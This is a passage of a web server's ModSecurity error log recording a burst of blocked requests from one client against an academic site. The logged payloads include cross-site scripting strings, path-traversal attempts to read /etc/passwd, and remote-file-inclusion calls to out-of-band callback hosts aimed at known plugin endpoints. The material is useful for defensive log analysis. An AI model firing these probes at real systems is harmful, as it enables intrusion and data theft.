"digilibft.unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155MCo-f0AAAoLfX8AAAAG"]
[Tue Aug 29 11:54:00.548115 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156MCo-f0AAAoUJfcAAAAB"]
[Tue Aug 29 11:54:00.603771 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156MCo-f0AAApJDWMAAAAY"]
[Tue Aug 29 11:54:00.619820 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156MCo-f0AAAoGFhgAAAAE"]
[Tue Aug 29 11:54:00.647182 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO156MCo-f0AAAowNuMAAAAH"]
[Tue Aug 29 11:54:01.626908 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156cCo-f0AAAn40-4AAAAW"]
[Tue Aug 29 11:54:02.635948 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO156sCo-f0AAAofnA0AAAAX"]
[Tue Aug 29 11:54:04.666511 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO157MCo-f0AAApQ2XIAAAAb"]
[Tue Aug 29 11:54:04.699086 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157MCo-f0AAAox7N0AAAAN"]
[Tue Aug 29 11:54:08.195581 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO158MCo-f0AAApQ2YUAAAAb"]
[Tue Aug 29 11:54:08.540273 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAAox7PkAAAAN"]
[Tue Aug 29 11:54:09.720507 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158cCo-f0AAApXgakAAAAU"]
[Tue Aug 29 11:54:10.672561 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO158sCo-f0AAAox7QEAAAAN"]
[Tue Aug 29 11:54:11.537401 2023] [:error] [pid 2648] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO1588Co-f0AAApYpnAAAAAa"]
[Tue Aug 29 11:54:12.596582 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb048z9gyexghhbn.oast.site found within TX:1: cjmnijtjmimvgniikdb048z9gyexghhbn.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO159MCo-f0AAApV20MAAAAJ"]
[Tue Aug 29 11:54:14.104948 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAAoZ6aYAAAAK"]
[Tue Aug 29 11:54:14.149040 2023] [:error] [pid 2648] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAApYpoIAAAAa"]
[Tue Aug 29 11:54:14.649149 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO159sCo-f0AAAo2m-UAAAAA"]
[Tue Aug 29 11:54:14.685119 2023] [:error] [pid 2658] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO159sCo-f0AAApilygAAAAl"]
[Tue Aug 29 11:54:15.552493 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/comm.php"] [unique_id "ZO1598Co-f0AAAph8uUAAAAj"]
[Tue Aug 29 11:54:16.699130 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@MCo-f0AAApWY3IAAAAM"]
[Tue Aug 29 11:54:16.807247 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@MCo-f0AAAoGFkkAAAAE"]
[Tue Aug 29 11:54:20.980943 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-MCo-f0AAAoZ6cAAAAAK"]
[Tue Aug 29 11:54:21.066847 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-cCo-f0AAAor7uUAAAAk"]
[Tue Aug 29 11:54:21.637686 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-cCo-f0AAAoAk78AAAAC"]
[Tue Aug 29 11:54:22.883466 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-sCo-f0AAAo2nAwAAAAA"]
[Tue Aug 29 11:54:23.572666 2023] [:error] [pid 2676] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO15-8Co-f0AAAp0OEUAAAAI"]
[Tue Aug 29 11:54:25.301403 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AcCo-f0AAAph8v0AAAAj"]
[Tue Aug 29 11:54:27.027196 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAApV22EAAAAJ"]
[Tue Aug 29 11:54:27.108868 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:q: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/addons/"] [unique_id "ZO16A8Co-f0AAApXgeAAAAAU"]
[Tue Aug 29 11:54:27.594601 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAApl9-0AAAAo"]
[Tue Aug 29 11:54:29.798818 2023] [:error] [pid 2715] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BcCo-f0AAAqb-pgAAAAu"]
[Tue Aug 29 11:54:30.728734 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16BsCo-f0AAApgAzkAAAAH"]
